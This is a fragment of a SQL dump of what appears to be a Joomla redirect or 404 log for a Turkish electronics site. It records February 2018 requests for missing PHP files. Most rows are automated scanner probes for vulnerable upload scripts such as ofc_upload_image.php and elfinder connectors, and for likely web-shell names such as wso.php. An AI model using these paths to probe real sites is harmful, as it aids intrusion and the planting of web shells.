00:00:00',301),(18295,'http://3s-technologies.com.tr/wp-content/plugins/wp-login-att-log/db.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-05 10:25:35','0000-00-00 00:00:00',301),(18296,'http://3s-technologies.com.tr/ecss.php',NULL,'3s-technologies.com.tr','',2,0,'2018-02-05 10:26:07','0000-00-00 00:00:00',301),(18297,'http://3s-technologies.com.tr/wp-content/uploads/2018/02/maink.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-05 10:31:14','0000-00-00 00:00:00',301),(18298,'http://3s-technologies.com.tr/wp-content/themes/maxbusiness/db.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-05 10:31:51','0000-00-00 00:00:00',301),(18299,'http://3s-technologies.com.tr/wp-content/plugins/hello.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-05 10:31:54','0000-00-00 00:00:00',301),(18300,'http://3s-technologies.com.tr/wp-post.php',NULL,'3s-technologies.com.tr','',2,0,'2018-02-05 10:43:57','0000-00-00 00:00:00',301),(18301,'http://3s-technologies.com.tr/cache/iph.php',NULL,'3s-technologies.com.tr','',2,0,'2018-02-05 10:45:47','0000-00-00 00:00:00',301),(18302,'http://3s-technologies.com.tr/tip.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-05 10:46:36','0000-00-00 00:00:00',301),(18303,'http://3s-technologies.com.tr/dbss.php',NULL,'3s-technologies.com.tr','',1,0,'2018-02-05 10:50:40','0000-00-00 00:00:00',301),(18304,'http://3s-technologies.com.tr/inlos.php',NULL,'3s-technologies.com.tr','',2,0,'2018-02-05 10:52:41','0000-00-00 00:00:00',301),(18305,'http://3s-technologies.com.tr/sph.php',NULL,'3s-technologies.com.tr','',2,0,'2018-02-05 10:53:06','0000-00-00 00:00:00',301),(18306,'https://3s-technologies.com.tr/libraries/joomla/session/session.php',NULL,'3s-technologies.com.tr','',3,0,'2018-02-05 12:16:58','0000-00-00 00:00:00',301),(18307,'http://3s-technologies.com.tr/libraries/joomla/session/session.php',NULL,'3s-technologies.com.tr','',7,0,'2018-02-05 12:18:19','0000-00-00 00:00:00',301),(18308,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/dirdesc/results,6-10?language=en-gb',NULL,'','',1,0,'2018-02-05 13:07:56','0000-00-00 00:00:00',301),(18309,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/fluid_forms/file-upload/server/node/server.js',NULL,'','',1,0,'2018-02-05 16:16:53','0000-00-00 00:00:00',301),(18310,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-02-05 21:01:44','0000-00-00 00:00:00',301),(18311,'http://3s-technologies.com.tr/tr/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','',4,0,'2018-02-06 04:39:32','0000-00-00 00:00:00',301),(18312,'http://3s-technologies.com.tr/en/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-06 07:35:10','0000-00-00 00:00:00',301),(18313,'http://3s-technologies.com.tr/en/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',10,0,'2018-02-06 08:17:05','0000-00-00 00:00:00',301),(18314,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2018-02-06 14:18:39','0000-00-00 00:00:00',301),(18315,'http://3s-technologies.com.tr/en/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',8,0,'2018-02-06 14:21:36','0000-00-00 00:00:00',301),(18316,'http://3s-technologies.com.tr/en/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',9,0,'2018-02-06 15:11:19','0000-00-00 00:00:00',301),(18317,'http://3s-technologies.com.tr/en/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',7,0,'2018-02-06 15:52:48','0000-00-00 00:00:00',301),(18318,'http://3s-technologies.com.tr/tr/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','',4,0,'2018-02-07 03:57:48','0000-00-00 00:00:00',301),(18319,'http://3s-technologies.com.tr/tr/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','',23,0,'2018-02-07 03:57:49','0000-00-00 00:00:00',301),(18320,'http://3s-technologies.com.tr/tr/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-07 03:57:51','0000-00-00 00:00:00',301),(18321,'http://3s-technologies.com.tr/en/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-07 06:56:27','0000-00-00 00:00:00',301),(18322,'http://3s-technologies.com.tr/en/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','',8,0,'2018-02-07 06:56:28','0000-00-00 00:00:00',301),(18323,'http://3s-technologies.com.tr/en/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-07 06:56:28','0000-00-00 00:00:00',301),(18324,'http://3s-technologies.com.tr/tr/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',4,0,'2018-02-07 13:16:50','0000-00-00 00:00:00',301),(18325,'http://3s-technologies.com.tr/tr/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',20,0,'2018-02-07 13:16:53','0000-00-00 00:00:00',301),(18326,'http://3s-technologies.com.tr/en/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',10,0,'2018-02-07 16:31:27','0000-00-00 00:00:00',301),(18327,'http://3s-technologies.com.tr/en/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-07 16:31:27','0000-00-00 00:00:00',301),(18328,'http://3s-technologies.com.tr/tr/libraries/joomla/template/mide.php',NULL,'http://site.ru','',13,0,'2018-02-08 07:17:09','0000-00-00 00:00:00',301),(18329,'http://3s-technologies.com.tr/tr/components/com_content/models/classes.php',NULL,'http://site.ru','',1,0,'2018-02-08 07:17:17','0000-00-00 00:00:00',301),(18330,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/thru-hole',NULL,'','',3,0,'2018-02-08 07:30:31','0000-00-00 00:00:00',301),(18331,'http://3s-technologies.com.tr/tr/modules/mod_articles_category/tmpl/defult.php',NULL,'http://site.ru','',1,0,'2018-02-08 08:03:55','0000-00-00 00:00:00',301),(18332,'http://3s-technologies.com.tr/tr/components/com_foxcontact/d.php',NULL,'http://site.ru','',2,0,'2018-02-08 08:04:54','0000-00-00 00:00:00',301),(18333,'http://3s-technologies.com.tr/tr/modules/mod_widget/mod_widget.php',NULL,'http://site.ru','',4,0,'2018-02-08 08:05:09','0000-00-00 00:00:00',301),(18334,'http://3s-technologies.com.tr/tr/media/editors/codemirror/mode/octave/putenv.php',NULL,'http://site.ru','',1,0,'2018-02-08 08:05:51','0000-00-00 00:00:00',301),(18335,'http://3s-technologies.com.tr/tr/df.php',NULL,'http://site.ru','',2,0,'2018-02-08 08:15:15','0000-00-00 00:00:00',301),(18336,'http://3s-technologies.com.tr/tr/templates/beez/banner.php',NULL,'http://site.ru','',1,0,'2018-02-08 08:15:40','0000-00-00 00:00:00',301),(18337,'http://3s-technologies.com.tr/tr/tmp/c2.php',NULL,'http://site.ru','',1,0,'2018-02-08 09:40:14','0000-00-00 00:00:00',301),(18338,'http://3s-technologies.com.tr/tr/libraries/phputf8/str_parser.php',NULL,'http://site.ru','',4,0,'2018-02-08 09:40:34','0000-00-00 00:00:00',301),(18339,'http://3s-technologies.com.tr/tr/modules/mod_search/updates.php',NULL,'http://site.ru','',1,0,'2018-02-08 09:50:42','0000-00-00 00:00:00',301),(18340,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/config.php',NULL,'http://site.ru','',2,0,'2018-02-08 10:29:35','0000-00-00 00:00:00',301),(18341,'http://3s-technologies.com.tr/tr/customizer.php',NULL,'http://site.ru','',5,0,'2018-02-08 10:37:39','0000-00-00 00:00:00',301),(18342,'http://3s-technologies.com.tr/tr/categories.php',NULL,'http://site.ru','',5,0,'2018-02-08 11:15:42','0000-00-00 00:00:00',301),(18343,'http://3s-technologies.com.tr/tr/gallery.php',NULL,'http://site.ru','',8,0,'2018-02-08 11:15:54','0000-00-00 00:00:00',301),(18344,'http://3s-technologies.com.tr/tr/modules/mod_mysqlw/mod_mysqlw.php',NULL,'http://site.ru','',2,0,'2018-02-08 11:16:21','0000-00-00 00:00:00',301),(18345,'http://3s-technologies.com.tr/tr/x.php',NULL,'http://site.ru','',399,0,'2018-02-08 11:17:58','0000-00-00 00:00:00',301),(18346,'http://3s-technologies.com.tr/tr/modules/mod_tags_similar/userloader.php',NULL,'http://site.ru','',1,0,'2018-02-08 12:01:29','0000-00-00 00:00:00',301),(18347,'http://3s-technologies.com.tr/tr/gadsense/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-02-08 12:01:55','0000-00-00 00:00:00',301),(18348,'http://3s-technologies.com.tr/tr/libraries/simplepie/idn/idnb_convert.class.php',NULL,'http://site.ru','',2,0,'2018-02-08 12:02:21','0000-00-00 00:00:00',301),(18349,'http://3s-technologies.com.tr/tr/cli/851.php',NULL,'http://site.ru','',2,0,'2018-02-08 12:12:21','0000-00-00 00:00:00',301),(18350,'http://3s-technologies.com.tr/tr/j15/administrator/components/com_weblinks/sql-omn.php',NULL,'http://site.ru','',1,0,'2018-02-08 12:12:38','0000-00-00 00:00:00',301),(18351,'http://3s-technologies.com.tr/tr/components/com_xmap/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/components/com_xmap/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-08 12:40:51','0000-00-00 00:00:00',301),(18352,'http://3s-technologies.com.tr/tr/administrator/components/com_xmap/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_xmap/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-08 12:40:51','0000-00-00 00:00:00',301),(18353,'http://3s-technologies.com.tr/tr/components/com_foxcontact/uploads/ly.php',NULL,'http://site.ru','',7,0,'2018-02-08 12:48:46','0000-00-00 00:00:00',301),(18354,'http://3s-technologies.com.tr/tr/cli/cli.php',NULL,'http://site.ru','',2,0,'2018-02-08 12:59:16','0000-00-00 00:00:00',301),(18355,'http://3s-technologies.com.tr/tr/libraries/legacy/contacts.php',NULL,'http://site.ru','',2,0,'2018-02-08 13:34:48','0000-00-00 00:00:00',301),(18356,'http://3s-technologies.com.tr/tr/components/com_foxcontact/e.php',NULL,'http://site.ru','',2,0,'2018-02-08 13:45:22','0000-00-00 00:00:00',301),(18357,'http://3s-technologies.com.tr/tr/fosmanual/cache/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-08 14:21:40','0000-00-00 00:00:00',301),(18358,'http://3s-technologies.com.tr/tr/bin/logs.php',NULL,'http://site.ru','',3,0,'2018-02-08 14:21:40','0000-00-00 00:00:00',301),(18359,'http://3s-technologies.com.tr/tr/ass.php',NULL,'http://site.ru','',27,0,'2018-02-08 14:23:26','0000-00-00 00:00:00',301),(18360,'http://3s-technologies.com.tr/en/components/com_xmap/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_xmap/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-08 15:32:01','0000-00-00 00:00:00',301),(18361,'http://3s-technologies.com.tr/en/administrator/components/com_xmap/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_xmap/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-08 15:32:04','0000-00-00 00:00:00',301),(18362,'http://3s-technologies.com.tr/tr/plugins/system/anticopy/anticopy.php',NULL,'http://site.ru','',3,0,'2018-02-08 16:10:43','0000-00-00 00:00:00',301),(18363,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/version.php',NULL,'http://site.ru','',2,0,'2018-02-08 16:10:58','0000-00-00 00:00:00',301),(18364,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,category_name/results,1-10',NULL,'','',1,0,'2018-02-08 16:28:27','0000-00-00 00:00:00',301),(18365,'http://3s-technologies.com.tr/tr/media/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-08 16:55:59','0000-00-00 00:00:00',301),(18366,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/controllers/theme.php',NULL,'http://site.ru','',4,0,'2018-02-08 16:56:51','0000-00-00 00:00:00',301),(18367,'http://3s-technologies.com.tr/tr/plugins/content/geshi/geshi/geshi/geshi.php',NULL,'http://site.ru','',1,0,'2018-02-08 17:00:46','0000-00-00 00:00:00',301),(18368,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/tolo_logo_150x150.jpg',NULL,'','',1,0,'2018-02-08 17:01:06','0000-00-00 00:00:00',301),(18369,'http://3s-technologies.com.tr/tr/mide.php',NULL,'http://site.ru','',4,0,'2018-02-08 17:06:27','0000-00-00 00:00:00',301),(18370,'http://3s-technologies.com.tr/tr/includes/img/mode.php',NULL,'http://site.ru','',5,0,'2018-02-08 17:43:21','0000-00-00 00:00:00',301),(18371,'http://3s-technologies.com.tr/tr/css.php',NULL,'http://site.ru','',526,0,'2018-02-08 17:46:25','0000-00-00 00:00:00',301),(18372,'http://3s-technologies.com.tr/tr/babbitts.php',NULL,'http://site.ru','',18,0,'2018-02-08 17:47:40','0000-00-00 00:00:00',301),(18373,'http://3s-technologies.com.tr/tr/components/com_jooomlat/s.php',NULL,'http://site.ru','',4,0,'2018-02-08 17:53:31','0000-00-00 00:00:00',301),(18374,'http://3s-technologies.com.tr/tr/wp-blog-posts.php',NULL,'http://site.ru','',8,0,'2018-02-08 18:28:33','0000-00-00 00:00:00',301),(18375,'http://3s-technologies.com.tr/tr/food.php',NULL,'http://site.ru','',5,0,'2018-02-08 19:14:38','0000-00-00 00:00:00',301),(18376,'http://3s-technologies.com.tr/tr/wp-api.php',NULL,'http://site.ru','',90,0,'2018-02-08 19:16:04','0000-00-00 00:00:00',301),(18377,'http://3s-technologies.com.tr/tr/index8632.php',NULL,'http://site.ru','',5,0,'2018-02-09 02:06:39','0000-00-00 00:00:00',301),(18378,'http://3s-technologies.com.tr/tr/plugins/system/plg_system_rewrite/copyright.php',NULL,'http://site.ru','',1,0,'2018-02-09 02:07:32','0000-00-00 00:00:00',301),(18379,'http://3s-technologies.com.tr/tr/tmp/abc.php',NULL,'http://site.ru','',1,0,'2018-02-09 02:16:49','0000-00-00 00:00:00',301),(18380,'http://3s-technologies.com.tr/tr/images/web-info.php',NULL,'http://site.ru','',2,0,'2018-02-09 02:16:49','0000-00-00 00:00:00',301),(18381,'http://3s-technologies.com.tr/tr/administrator/header_img.php.suspected',NULL,'http://site.ru','',2,0,'2018-02-09 02:52:31','0000-00-00 00:00:00',301),(18382,'http://3s-technologies.com.tr/tr/class-wp-defaults.php',NULL,'http://site.ru','',3,0,'2018-02-09 02:57:07','0000-00-00 00:00:00',301),(18383,'http://3s-technologies.com.tr/tr/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','',4,0,'2018-02-09 03:28:17','0000-00-00 00:00:00',301),(18384,'http://3s-technologies.com.tr/tr/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-09 03:28:17','0000-00-00 00:00:00',301),(18385,'http://3s-technologies.com.tr/tr/hello.php',NULL,'http://site.ru','',76,0,'2018-02-09 03:38:56','0000-00-00 00:00:00',301),(18386,'http://3s-technologies.com.tr/tr/mod_config.php.suspected',NULL,'http://site.ru','',3,0,'2018-02-09 03:41:24','0000-00-00 00:00:00',301),(18387,'http://3s-technologies.com.tr/tr/layouts/joomla/content/info_block/bass.php',NULL,'http://site.ru','',1,0,'2018-02-09 04:23:58','0000-00-00 00:00:00',301),(18388,'http://3s-technologies.com.tr/tr/tmp/install.css.php',NULL,'http://site.ru','',2,0,'2018-02-09 04:24:45','0000-00-00 00:00:00',301),(18389,'http://3s-technologies.com.tr/tr/plugins/search/index.php',NULL,'http://site.ru','',2,0,'2018-02-09 04:25:07','0000-00-00 00:00:00',301),(18390,'http://3s-technologies.com.tr/tr/modules/mod_defender/tmpl/template.php',NULL,'http://site.ru','',3,0,'2018-02-09 04:29:53','0000-00-00 00:00:00',301),(18391,'http://3s-technologies.com.tr/tr/v3.php',NULL,'http://site.ru','',115,0,'2018-02-09 04:33:30','0000-00-00 00:00:00',301),(18392,'http://3s-technologies.com.tr/tr/cache/css.php',NULL,'http://site.ru','',7,0,'2018-02-09 04:35:00','0000-00-00 00:00:00',301),(18393,'http://3s-technologies.com.tr/tr/elfinder/php/connector.php',NULL,'http://3s-technologies.com.tr/tr/elfinder/php/connector.php','',12,0,'2018-02-09 05:09:29','0000-00-00 00:00:00',301),(18394,'http://3s-technologies.com.tr/tr/mary.php',NULL,'http://site.ru','',4,0,'2018-02-09 05:10:57','0000-00-00 00:00:00',301),(18395,'http://3s-technologies.com.tr/tr/page.php',NULL,'http://site.ru','',13,0,'2018-02-09 05:31:36','0000-00-00 00:00:00',301),(18396,'http://3s-technologies.com.tr/tr/aul.php',NULL,'http://site.ru','',5,0,'2018-02-09 05:55:39','0000-00-00 00:00:00',301),(18397,'http://3s-technologies.com.tr/tr/libraries/joomla/linkedin/local.php',NULL,'http://site.ru','',2,0,'2018-02-09 05:56:55','0000-00-00 00:00:00',301),(18398,'http://3s-technologies.com.tr/tr/components/com_foxcontact/wso.php',NULL,'http://site.ru','',2,0,'2018-02-09 06:07:39','0000-00-00 00:00:00',301),(18399,'http://3s-technologies.com.tr/en/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','',2,0,'2018-02-09 06:39:04','0000-00-00 00:00:00',301),(18400,'http://3s-technologies.com.tr/en/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_redmystic/chart/php-ofc-library/ofc_upload_image.php','',1,0,'2018-02-09 06:39:04','0000-00-00 00:00:00',301),(18401,'http://3s-technologies.com.tr/tr/modules/mod_articles_tags/tmpl/mide.php',NULL,'http://site.ru','',1,0,'2018-02-09 06:50:58','0000-00-00 00:00:00',301),(18402,'http://3s-technologies.com.tr/tr/libraries/joomla/extended.php',NULL,'http://site.ru','',1,0,'2018-02-09 07:26:31','0000-00-00 00:00:00',301),(18403,'http://3s-technologies.com.tr/tr/ajax-requests.new.php',NULL,'http://site.ru','',5,0,'2018-02-09 07:26:56','0000-00-00 00:00:00',301),(18404,'http://3s-technologies.com.tr/tr/libraries/joomla/database/importer/wkism.php',NULL,'http://site.ru','',1,0,'2018-02-09 07:36:40','0000-00-00 00:00:00',301),(18405,'http://3s-technologies.com.tr/tr/components/com_foxcontact/tim.php',NULL,'http://site.ru','',1,0,'2018-02-09 07:36:43','0000-00-00 00:00:00',301),(18406,'http://3s-technologies.com.tr/tr/b.php',NULL,'http://site.ru','',141,0,'2018-02-09 07:36:57','0000-00-00 00:00:00',301),(18407,'http://3s-technologies.com.tr/tr/s.php',NULL,'http://site.ru','',225,0,'2018-02-09 08:33:33','0000-00-00 00:00:00',301),(18408,'http://3s-technologies.com.tr/tr/images/temp.php',NULL,'http://site.ru','',1,0,'2018-02-09 08:34:13','0000-00-00 00:00:00',301),(18409,'http://3s-technologies.com.tr/tr/components/com_weblinks/models/setup.php.suspected',NULL,'http://site.ru','',2,0,'2018-02-09 08:34:35','0000-00-00 00:00:00',301),(18410,'http://3s-technologies.com.tr/tr/generationmap.php',NULL,'http://site.ru','',4,0,'2018-02-09 09:18:46','0000-00-00 00:00:00',301),(18411,'http://3s-technologies.com.tr/tr/c.php',NULL,'http://site.ru','',178,0,'2018-02-09 09:19:12','0000-00-00 00:00:00',301),(18412,'http://3s-technologies.com.tr/tr/media/index.php',NULL,'http://site.ru','',2,0,'2018-02-09 09:20:04','0000-00-00 00:00:00',301),(18413,'http://3s-technologies.com.tr/tr/libraries/joomla/access/strange.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-09 09:25:24','0000-00-00 00:00:00',301),(18414,'http://3s-technologies.com.tr/tr/components/error.php',NULL,'http://site.ru','',3,0,'2018-02-09 10:04:36','0000-00-00 00:00:00',301),(18415,'http://3s-technologies.com.tr/tr/cgi.php',NULL,'http://site.ru','',13,0,'2018-02-09 10:05:04','0000-00-00 00:00:00',301),(18416,'http://www.3s-technologies.com.tr/en/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',4,0,'2018-02-09 10:17:27','0000-00-00 00:00:00',301),(18417,'http://www.3s-technologies.com.tr/en/products/smd-fд±rд±n',NULL,'','',1,0,'2018-02-09 10:23:09','0000-00-00 00:00:00',301),(18418,'http://3s-technologies.com.tr/tr/administrator/log.php.php',NULL,'http://site.ru','',2,0,'2018-02-09 10:49:07','0000-00-00 00:00:00',301),(18419,'http://3s-technologies.com.tr/tr/therm.php',NULL,'http://site.ru','',5,0,'2018-02-09 10:49:10','0000-00-00 00:00:00',301),(18420,'http://3s-technologies.com.tr/tr/plugins/captcha/admin.php',NULL,'http://site.ru','',2,0,'2018-02-09 10:50:05','0000-00-00 00:00:00',301),(18421,'http://3s-technologies.com.tr/tr/marvins.php',NULL,'http://site.ru','',93,0,'2018-02-09 11:34:01','0000-00-00 00:00:00',301),(18422,'http://3s-technologies.com.tr/tr/modules/img/mode.php',NULL,'http://site.ru','',10,0,'2018-02-09 11:34:05','0000-00-00 00:00:00',301),(18423,'http://3s-technologies.com.tr/tr/eladm.php',NULL,'http://site.ru','',5,0,'2018-02-09 11:34:22','0000-00-00 00:00:00',301),(18424,'http://3s-technologies.com.tr/tr/modules/mod_random_image/tmpl/styles.php',NULL,'http://site.ru','',1,0,'2018-02-09 11:35:05','0000-00-00 00:00:00',301),(18425,'http://3s-technologies.com.tr/tr/license.php',NULL,'http://site.ru','',131,0,'2018-02-09 12:18:10','0000-00-00 00:00:00',301),(18426,'http://3s-technologies.com.tr/tr/hexhglal.php',NULL,'http://site.ru','',2,0,'2018-02-09 12:19:13','0000-00-00 00:00:00',301),(18427,'http://3s-technologies.com.tr/tr/wp-logout.php',NULL,'http://site.ru','',35,0,'2018-02-09 12:19:31','0000-00-00 00:00:00',301),(18428,'http://3s-technologies.com.tr/tr/pasts.php',NULL,'http://site.ru','',6,0,'2018-02-09 12:29:03','0000-00-00 00:00:00',301),(18429,'http://3s-technologies.com.tr/tr/pasts.php',NULL,'http://site.ru','',1,0,'2018-02-09 12:29:03','0000-00-00 00:00:00',301),(18430,'http://3s-technologies.com.tr/tr/plugins/editors/css.php',NULL,'http://site.ru','',1,0,'2018-02-09 12:29:12','0000-00-00 00:00:00',301),(18431,'http://3s-technologies.com.tr/tr/language/lv-lv/lv-lv.localise2.php',NULL,'http://site.ru','',2,0,'2018-02-09 12:39:19','0000-00-00 00:00:00',301),(18432,'http://3s-technologies.com.tr/tr/miwed.php',NULL,'http://site.ru','',5,0,'2018-02-09 13:03:57','0000-00-00 00:00:00',301),(18433,'http://www.3s-technologies.com.tr/tr/joomla/components/com_b2jcontact/index.html',NULL,'','',1,0,'2018-02-09 13:55:01','0000-00-00 00:00:00',301),(18434,'http://3s-technologies.com.tr/tr/language/en-gb/language.php',NULL,'http://site.ru','',1,0,'2018-02-09 15:34:49','0000-00-00 00:00:00',301),(18435,'http://3s-technologies.com.tr/tr/libraries/joomla/github/extras.php',NULL,'http://site.ru','',1,0,'2018-02-09 16:09:09','0000-00-00 00:00:00',301),(18436,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/ini.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-09 16:21:47','0000-00-00 00:00:00',301),(18437,'http://3s-technologies.com.tr/tr/logs/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2018-02-09 16:31:07','0000-00-00 00:00:00',301),(18438,'http://3s-technologies.com.tr/tr/error.php',NULL,'http://site.ru','',202,0,'2018-02-09 16:58:51','0000-00-00 00:00:00',301),(18439,'http://3s-technologies.com.tr/tr/modules/mod_login/log.php.php',NULL,'http://site.ru','',1,0,'2018-02-09 17:39:52','0000-00-00 00:00:00',301),(18440,'http://3s-technologies.com.tr/tr/modules/mod_system/mod_system.php',NULL,'http://site.ru','',2,0,'2018-02-09 19:10:57','0000-00-00 00:00:00',301),(18441,'http://3s-technologies.com.tr/tr/components/com_wrapper/views/wrapper/wrapper.php',NULL,'http://site.ru','',1,0,'2018-02-09 19:13:43','0000-00-00 00:00:00',301),(18442,'http://3s-technologies.com.tr/tr/scc.php',NULL,'http://site.ru','',6,0,'2018-02-09 19:54:12','0000-00-00 00:00:00',301),(18443,'http://3s-technologies.com.tr/tr/components/gif.php',NULL,'http://site.ru','',2,0,'2018-02-09 20:41:48','0000-00-00 00:00:00',301),(18444,'http://3s-technologies.com.tr/tr/defined.php',NULL,'http://site.ru','',3,0,'2018-02-09 20:47:33','0000-00-00 00:00:00',301),(18445,'http://3s-technologies.com.tr/tr/assets/images/content-post.php',NULL,'http://site.ru','',8,0,'2018-02-09 21:23:59','0000-00-00 00:00:00',301),(18446,'http://3s-technologies.com.tr/tr/libraries/joomla/access/strangers.php',NULL,'http://site.ru','',1,0,'2018-02-09 22:48:48','0000-00-00 00:00:00',301),(18447,'http://3s-technologies.com.tr/tr/components/com_finder/controllers/controllers.php',NULL,'http://site.ru','',2,0,'2018-02-09 22:52:48','0000-00-00 00:00:00',301),(18448,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/help.php',NULL,'http://site.ru','',3,0,'2018-02-09 23:32:11','0000-00-00 00:00:00',301),(18449,'http://3s-technologies.com.tr/tr/administrator/components/com_media/views/media/gheds.php',NULL,'http://site.ru','',2,0,'2018-02-10 00:16:35','0000-00-00 00:00:00',301),(18450,'http://3s-technologies.com.tr/tr/language/lv-lv/lv-lv.localise4.php',NULL,'http://site.ru','',1,0,'2018-02-10 00:17:58','0000-00-00 00:00:00',301),(18451,'http://3s-technologies.com.tr/en/libraries/phputf8/utils/urlencode.php?id=event',NULL,'3s-technologies.com.tr','',1,0,'2018-02-10 00:23:09','0000-00-00 00:00:00',301),(18452,'http://3s-technologies.com.tr/tr/components/com_foxcontact/w.php',NULL,'http://site.ru','',4,0,'2018-02-10 00:58:33','0000-00-00 00:00:00',301),(18453,'http://3s-technologies.com.tr/tr/images/stories/ar.php',NULL,'http://site.ru','',1,0,'2018-02-10 00:58:51','0000-00-00 00:00:00',301),(18454,'http://3s-technologies.com.tr/en//wp-includes/wlwmanifest.xml',NULL,'','',116,0,'2018-02-10 01:06:22','0000-00-00 00:00:00',301),(18455,'http://3s-technologies.com.tr/en//xmlrpc.php?rsd',NULL,'','',29,0,'2018-02-10 01:06:22','0000-00-00 00:00:00',301),(18456,'http://3s-technologies.com.tr/en//blog/wp-includes/wlwmanifest.xml',NULL,'','',118,0,'2018-02-10 01:06:23','0000-00-00 00:00:00',301),(18457,'http://3s-technologies.com.tr/en//wordpress/wp-includes/wlwmanifest.xml',NULL,'','',119,0,'2018-02-10 01:06:24','0000-00-00 00:00:00',301),(18458,'http://3s-technologies.com.tr/en//wp/wp-includes/wlwmanifest.xml',NULL,'','',117,0,'2018-02-10 01:06:24','0000-00-00 00:00:00',301),(18459,'http://3s-technologies.com.tr/en//site/wp-includes/wlwmanifest.xml',NULL,'','',119,0,'2018-02-10 